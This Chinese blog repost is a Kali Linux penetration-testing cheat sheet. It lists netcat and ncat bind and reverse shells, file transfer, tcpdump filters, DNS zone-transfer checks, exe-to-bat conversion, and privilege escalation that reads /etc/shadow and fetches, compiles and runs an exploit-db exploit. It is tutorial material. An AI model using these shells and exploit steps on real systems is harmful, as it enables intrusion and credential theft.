kali渗透测试工具方法

kali作为一个渗透测试者最受欢迎的操作系统,集成了非常多的安全工具,让渗透测试人员更方便的做一些渗透测试工作,本文来自国外某位大神的github,在这里给大家做一个分享,具体内容如下:

Netcat


netcat是一个优秀的网络工具,在业界有“瑞士军刀”的美誉,通常在Linux系统下都自带了。

测试环境

Kali 192.168.2.10 Windows 192.168.2.12

聊天

Windows nc -nlvp 4444 Kali nc -nv 192.168.2.12 4444

正向shell

Windows nc -nlvp 4444 -e cmd.exe Kali nc -nv 192.168.2.12 4444

反向shell

Windows nc -nlvp 4444 Kali nc -nv 192.168.2.12 4444 -e /bin/bash

文件传输

Windows nc -nlvp 4444 > incoming.exe Kali nc -nv 192.168.2.12 < /usr/share/windows-binnaries/wget.exe

Ncat


Ncat是nmap工具集的一部分,使用如下命令使用Ncat生成一个正向shell:

Windows ncat -nlvp 4444 -e cmd.exe --allow 192.168.2.10 --ssl Linux ncat -nv 192.168.2.12 4444 --ssl

tcpdump


tcpdump是Linux下一个网络包截取分析工具。它支持针对网络层、协议、主机、网络或端口的过滤,并提供and、or、not等逻辑语句来帮助你去掉无用的信息。

读取数据包文件

tcpdump -r <capture.pcap>

指定源IP获取数据包文件中的数据

tcpdump -n src host 192.168.2.10 -r <capture.pcap>

指定目的IP获取数据包文件中的数据

tcpdump -n dst host 192.168.2.12 -r <capture.pcap>

指定端口获取数据包文件中的数据

tcpdump -n port 443 -r <capture.pcap>

读取数据包文件并且以16进制显示

tcpdump -nX -r <capture.pcap>

利用host获取dns信息


host是一个用来执行dns查找的小工具。

枚举dns信息

host -t <type> target.com mx = mail server ns = name server

测试dns域传送

host -l target.com <DNS server>

EXE转bat


在某些特殊的情况下需要将exe转为bat,便于上传并执行,下面就是如何使用kali将exe转为bat。

cp /usr/share/windows-binaries/nc.exe /root/ cp /usr/share/windows-binaries/exe2bat.exe /root/ upx -9 nc.exe wine exe2bat.exe nc.exe nc.txt

Linux本地提权


在获得一个webshell之后,一般权限为apache权限,想要进一步的渗透测试需要将自己的权限提升到最高,下面是在Linux下提权使用命令。

ssh user@<target IP> id # 显示用户和组的权限 cat /etc/shadow # 保存的用户的密码,只有root权限可以查看 cat /etc/issue # 查看系统版本信息 uname -a

如何下载并执行提权exp:

wget -O exploit.c http://www.exploit-db.com/download/18411 gcc -o exploit exploit.c # 编译 ./exploit # 执行 id # 查看是否提权成功 cat /etc/shadow # 读取用户密码

总结

这个文章其实有点不想发,但是又没有好文章给大家分享,所以就凑合着给大家看看,毕竟不想浪费今天发文的机会,大家有好的文章不要藏着掖着,发给我有好礼相送呦。

原文发布于微信公众号 - 信安之路(xazlsec)

原文发表时间:2017-10-02

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏ThoughtWorks

Gradle 命令行黑魔法

#ThoughtWorkers好声音# 第十五期 关于 Gradle ,我们常常会想到的是如何编写一个 Task ,怎么写一个 Plugin ,但是对于 Gr...

2735
来自专栏李家的小酒馆

Spring面试题

什么是Spring Spring是一个轻量级的容器,他实现了IOC和非侵入的框架,并提供了AOP的实现方式,提供了持久层事务的支持,其让java开发模块化,并且...

4760
来自专栏java一日一条

Java锁优化

JVM规范规定JVM基于进入和退出Monitor对象来实现方法同步和代码块同步,但两者的实现细节不一样。代码块同步是使用monitorenter和monitor...

1761
来自专栏Java架构师学习

Java日志中最全面的框架介绍

在项目开发过程中,我们可以通过 debug 查找问题。而在线上环境我们查找问题只能通过打印日志的方式查找问题。因此对于一个项目而言,日志记录是一个非常重要的问题...

4298
来自专栏FreeBuf

利用Web查询文件(.iqy)有效钓鱼

几天前我在Casey Smith的twitter上看到了有关iqy文件的一些介绍,和大多数渗透测试人员或者技术狂热者一样我也在探寻它的价值。能够通过使用本地/可...

2936
来自专栏C/C++基础

C++实现简易log日志系统

在软件开发周期中,不管是前台还是后台,系统一般会采用一个持久化的日志系统来记录运行情况。

5682
来自专栏精讲JAVA

一文理解Netty模型架构

本文基于Netty4.1展开介绍相关理论模型,使用场景,基本组件、整体架构,知其然且知其所以然,希望给读者提供学习实践参考。

1532
来自专栏web编程技术分享

三分钟学会用SpringMVC搭建最小系统(超详细)

4778
来自专栏battcn

一起来学SpringBoot | 第二篇:SpringBoot配置详解

上一篇介绍了 SpringBoot 由来及构建方式,通过第一章的教程我们对 SpringBoot 不在感到陌生,可以发现 SpringBoot 虽然干掉了 XM...

1281
来自专栏Android开发实战

android Ndk JNI 入门

相信很多人对于NDK 开发都是懵逼的,比如都知道把加密的逻辑以及密钥放在so文件中,但是你知道怎么生成so文件吗?你知道开发jni吗?你熟悉jni语法吗?怎么配...

1532

扫码关注云+社区

领取腾讯云代金券